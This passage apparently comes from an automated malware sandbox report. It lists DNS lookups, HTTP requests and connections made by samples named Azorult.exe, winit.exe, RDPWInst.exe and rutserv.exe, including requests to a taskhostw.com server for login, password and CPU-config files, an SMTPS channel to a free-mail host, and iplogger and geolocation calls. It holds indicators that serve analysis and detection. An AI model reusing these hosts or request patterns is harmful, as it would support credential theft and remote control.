                                                                                                                                                                                                                                                                                                                                          ink.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          boglogov.site
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          ip-api.com
                                                                                                                                                                                                                                                                                                                                          winit.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          ip-api.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          ip-api.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          208.95.112.1
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://ip-api.com/json
                                                                                                                                                                                                                                                                                                                                          winit.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          208.95.112.1:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                          Host: ip-api.com
                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:12 GMT
                                                                                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                          Content-Length: 297
                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                          X-Ttl: 60
                                                                                                                                                                                                                                                                                                                                          X-Rl: 44
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          freemail.freehost.com.ua
                                                                                                                                                                                                                                                                                                                                          winit.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          freemail.freehost.com.ua
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          freemail.freehost.com.ua
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          194.0.200.251
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          RDPWInst.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          185.199.108.133
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          185.199.109.133
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          185.199.110.133
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          185.199.111.133
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          iplogger.org
                                                                                                                                                                                                                                                                                                                                          Azorult.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          iplogger.org
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          iplogger.org
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          104.21.4.208
                                                                                                                                                                                                                                                                                                                                          iplogger.org
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          172.67.132.113
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          https://iplogger.org/1qDK87
                                                                                                                                                                                                                                                                                                                                          Azorult.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          104.21.4.208:443
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /1qDK87 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                          Host: iplogger.org
                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:30 GMT
                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                          memory: 0.42897796630859375
                                                                                                                                                                                                                                                                                                                                          expires: Mon, 06 May 2024 18:16:30 +0000
                                                                                                                                                                                                                                                                                                                                          strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j6Bem1GA0HBfMaxVFzqsf6XEh15XmfW%2BT8U0ZbDNeAd9iUCxLZ2o1WdauQA%2Buewz1n7pVG7YA4RHUPDl3t5WVFDSFd8nTQqiyUIH8c7hNojYwy00a8psylnVpUUFg7M%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                                                                                          CF-RAY: 87faf6379d7e772b-LHR
                                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          apps.identrust.com
                                                                                                                                                                                                                                                                                                                                          Azorult.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          apps.identrust.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          apps.identrust.com
                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                          identrust.edgesuite.net
                                                                                                                                                                                                                                                                                                                                          identrust.edgesuite.net
                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                          a1952.dscq.akamai.net
                                                                                                                                                                                                                                                                                                                                          a1952.dscq.akamai.net
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          2.18.190.80
                                                                                                                                                                                                                                                                                                                                          a1952.dscq.akamai.net
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          2.18.190.81
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://apps.identrust.com/roots/dstrootcax3.p7c
                                                                                                                                                                                                                                                                                                                                          Azorult.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          2.18.190.80:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /roots/dstrootcax3.p7c HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                                                                                                                                                                                                          Host: apps.identrust.com
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                          X-Robots-Tag: noindex
                                                                                                                                                                                                                                                                                                                                          Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT
                                                                                                                                                                                                                                                                                                                                          ETag: "37d-5f433188daa00"
                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                          Content-Length: 893
                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                          X-Frame-Options: sameorigin
                                                                                                                                                                                                                                                                                                                                          Content-Type: application/pkcs7-mime
                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 06 May 2024 19:16:29 GMT
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:29 GMT
                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          RDPWInst.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          185.199.108.133
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          185.199.109.133
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          185.199.110.133
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          185.199.111.133
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          x2.c.lencr.org
                                                                                                                                                                                                                                                                                                                                          Azorult.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          x2.c.lencr.org
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          x2.c.lencr.org
                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                          crl.root-x1.letsencrypt.org.edgekey.net
                                                                                                                                                                                                                                                                                                                                          crl.root-x1.letsencrypt.org.edgekey.net
                                                                                                                                                                                                                                                                                                                                          IN CNAME
                                                                                                                                                                                                                                                                                                                                          e8652.dscx.akamaiedge.net
                                                                                                                                                                                                                                                                                                                                          e8652.dscx.akamaiedge.net
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          23.55.97.11
                                                                                                                                                                                                                                                                                                                                        • flag-be
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://x2.c.lencr.org/
                                                                                                                                                                                                                                                                                                                                          Azorult.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          23.55.97.11:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft-CryptoAPI/6.1
                                                                                                                                                                                                                                                                                                                                          Host: x2.c.lencr.org
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                                                                          Content-Type: application/pkix-crl
                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 12 Feb 2024 22:07:27 GMT
                                                                                                                                                                                                                                                                                                                                          ETag: "65ca969f-12b"
                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                          Expires: Mon, 06 May 2024 19:16:30 GMT
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:30 GMT
                                                                                                                                                                                                                                                                                                                                          Content-Length: 299
                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          taskhostw.com
                                                                                                                                                                                                                                                                                                                                          taskhostw.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          taskhostw.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          taskhostw.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          152.89.218.85
                                                                                                                                                                                                                                                                                                                                        • flag-ru
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://taskhostw.com/L.html
                                                                                                                                                                                                                                                                                                                                          taskhost.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          152.89.218.85:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /L.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                          Host: taskhostw.com
                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:31 GMT
                                                                                                                                                                                                                                                                                                                                          Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 25 Jan 2023 21:20:29 GMT
                                                                                                                                                                                                                                                                                                                                          ETag: "7-5f31d33a2e870"
                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                        • flag-us
                                                                                                                                                                                                                                                                                                                                          DNS
                                                                                                                                                                                                                                                                                                                                          taskhostw.com
                                                                                                                                                                                                                                                                                                                                          taskhostw.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          taskhostw.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          taskhostw.com
                                                                                                                                                                                                                                                                                                                                          IN A
                                                                                                                                                                                                                                                                                                                                          152.89.218.85
                                                                                                                                                                                                                                                                                                                                        • flag-ru
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://taskhostw.com/randomink/STATUS.html
                                                                                                                                                                                                                                                                                                                                          taskhostw.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          152.89.218.85:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /randomink/STATUS.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                          Host: taskhostw.com
                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:35 GMT
                                                                                                                                                                                                                                                                                                                                          Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 25 Sep 2023 13:40:42 GMT
                                                                                                                                                                                                                                                                                                                                          ETag: "6-6062f1ac52821"
                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                          Content-Length: 6
                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                        • flag-ru
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://taskhostw.com/randomink/loaderTOP.html
                                                                                                                                                                                                                                                                                                                                          taskhostw.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          152.89.218.85:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /randomink/loaderTOP.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                          Host: taskhostw.com
                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:35 GMT
                                                                                                                                                                                                                                                                                                                                          Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                                                                                          Content-Length: 275
                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                        • flag-ru
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://taskhostw.com/randomink/Login.html
                                                                                                                                                                                                                                                                                                                                          taskhostw.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          152.89.218.85:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /randomink/Login.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                          Host: taskhostw.com
                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:35 GMT
                                                                                                                                                                                                                                                                                                                                          Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 25 Sep 2023 13:40:42 GMT
                                                                                                                                                                                                                                                                                                                                          ETag: "4-6062f1abd776c"
                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                        • flag-ru
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://taskhostw.com/randomink/Password.html
                                                                                                                                                                                                                                                                                                                                          taskhostw.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          152.89.218.85:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /randomink/Password.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                          Host: taskhostw.com
                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:35 GMT
                                                                                                                                                                                                                                                                                                                                          Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 25 Sep 2023 13:40:42 GMT
                                                                                                                                                                                                                                                                                                                                          ETag: "c-6062f1abecf2a"
                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                          Content-Length: 12
                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                        • flag-ru
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://taskhostw.com/randomink/Server.html
                                                                                                                                                                                                                                                                                                                                          taskhostw.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          152.89.218.85:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /randomink/Server.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                          Host: taskhostw.com
                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:35 GMT
                                                                                                                                                                                                                                                                                                                                          Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 25 Sep 2023 13:40:42 GMT
                                                                                                                                                                                                                                                                                                                                          ETag: "e-6062f1ac372a4"
                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                          Content-Length: 14
                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                        • flag-ru
                                                                                                                                                                                                                                                                                                                                          GET
                                                                                                                                                                                                                                                                                                                                          http://taskhostw.com/randomink/configCPUX.html
                                                                                                                                                                                                                                                                                                                                          taskhostw.exe
                                                                                                                                                                                                                                                                                                                                          Remote address:
                                                                                                                                                                                                                                                                                                                                          152.89.218.85:80
                                                                                                                                                                                                                                                                                                                                          Request
                                                                                                                                                                                                                                                                                                                                          GET /randomink/configCPUX.html HTTP/1.1
                                                                                                                                                                                                                                                                                                                                          User-Agent: AutoIt
                                                                                                                                                                                                                                                                                                                                          Host: taskhostw.com
                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                          Response
                                                                                                                                                                                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                          Date: Mon, 06 May 2024 18:16:40 GMT
                                                                                                                                                                                                                                                                                                                                          Server: Apache/2.4.25 (Debian)
                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 25 Sep 2023 13:40:40 GMT
                                                                                                                                                                                                                                                                                                                                          ETag: "73-6062f1aa5a9cd"
                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                          Content-Length: 115
                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                        • 95.213.205.83:5655
                                                                                                                                                                                                                                                                                                                                          rms-server.tektonit.ru
                                                                                                                                                                                                                                                                                                                                          rutserv.exe
                                                                                                                                                                                                                                                                                                                                          1.9kB
                                                                                                                                                                                                                                                                                                                                          1.3kB
                                                                                                                                                                                                                                                                                                                                          19
                                                                                                                                                                                                                                                                                                                                          20
                                                                                                                                                                                                                                                                                                                                        • 208.95.112.1:80
                                                                                                                                                                                                                                                                                                                                          http://ip-api.com/json
                                                                                                                                                                                                                                                                                                                                          http
                                                                                                                                                                                                                                                                                                                                          winit.exe
                                                                                                                                                                                                                                                                                                                                          315 B
                                                                                                                                                                                                                                                                                                                                          566 B
                                                                                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                                                                                          2

                                                                                                                                                                                                                                                                                                                                          HTTP Request

                                                                                                                                                                                                                                                                                                                                          GET http://ip-api.com/json

                                                                                                                                                                                                                                                                                                                                          HTTP Response

                                                                                                                                                                                                                                                                                                                                          200
                                                                                                                                                                                                                                                                                                                                        • 194.0.200.251:465
                                                                                                                                                                                                                                                                                                                                          freemail.freehost.com.ua
                                                                                                                                                                                                                                                                                                                                          tls, smtps
                                                                                                                                                                                                                                                                                                                                          winit.exe
                                                                                                                                                                                                                                                                                                                                          5.1kB
                                                                                                                                                                                                                                                                                                                                          7.7kB
                                                                                                                                                                                                                                                                                                                                          25
                                                                                                                                                                                                                                                                                                                                          25
                                                                                                                                                                                                                                                                                                                                        • 185.199.108.133:443
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          tls
                                                                                                                                                                                                                                                                                                                                          RDPWInst.exe
                                                                                                                                                                                                                                                                                                                                          756 B
                                                                                                                                                                                                                                                                                                                                          4.7kB
                                                                                                                                                                                                                                                                                                                                          9
                                                                                                                                                                                                                                                                                                                                          11
                                                                                                                                                                                                                                                                                                                                        • 104.21.4.208:443
                                                                                                                                                                                                                                                                                                                                          https://iplogger.org/1qDK87
                                                                                                                                                                                                                                                                                                                                          tls, http
                                                                                                                                                                                                                                                                                                                                          Azorult.exe
                                                                                                                                                                                                                                                                                                                                          1.1kB
                                                                                                                                                                                                                                                                                                                                          15.0kB
                                                                                                                                                                                                                                                                                                                                          15
                                                                                                                                                                                                                                                                                                                                          20

                                                                                                                                                                                                                                                                                                                                          HTTP Request

                                                                                                                                                                                                                                                                                                                                          GET https://iplogger.org/1qDK87

                                                                                                                                                                                                                                                                                                                                          HTTP Response

                                                                                                                                                                                                                                                                                                                                          200
                                                                                                                                                                                                                                                                                                                                        • 2.18.190.80:80
                                                                                                                                                                                                                                                                                                                                          http://apps.identrust.com/roots/dstrootcax3.p7c
                                                                                                                                                                                                                                                                                                                                          http
                                                                                                                                                                                                                                                                                                                                          Azorult.exe
                                                                                                                                                                                                                                                                                                                                          369 B
                                                                                                                                                                                                                                                                                                                                          1.6kB
                                                                                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                                                                                          4

                                                                                                                                                                                                                                                                                                                                          HTTP Request

                                                                                                                                                                                                                                                                                                                                          GET http://apps.identrust.com/roots/dstrootcax3.p7c

                                                                                                                                                                                                                                                                                                                                          HTTP Response

                                                                                                                                                                                                                                                                                                                                          200
                                                                                                                                                                                                                                                                                                                                        • 185.199.108.133:443
                                                                                                                                                                                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                                                                                                                                                                                          tls
                                                                                                                                                                                                                                                                                                                                          RDPWInst.exe
                                                                                                                                                                                                                                                                                                                                          756 B
                                                                                                                                                                                                                                                                                                                                          4.7kB
                                                                                                                                                                                                                                                                                                                                          9
                                                                                                                                                                                                                                                                                                                                          11
                                                                                                                                                                                                                                                                                                                                        • 23.55.97.11:80
                                                                                                                                                                                                                                                                                                                                          http://x2.c.lencr.org/
                                                                                                                                                                                                                                                                                                                                          http
                                                                                                                                                                                                                                                                                                                                          Azorult.exe
                                                                                                                                                                                                                                                                                                                                          350 B
                                                                                                                                                                                                                                                                                                                                          1.3kB
                                                                                                                                                                                                                                                                                                                                          5
                                                                                                                                                                                                                                                                                                                                          4

                                                                                                                                                                                                                                                                                                                                          HTTP Request

                                                                                                                                                                                                                                                                                                                                          GET http://x2.c.lencr.org/

                                                                                                                                                                                                                                                                                                                                          HTTP Response

                                                                                                                                                                                                                                                                                                                                          200
                                                                                                                                                                                                                                                                                                                                        • 152.89.218.85:80
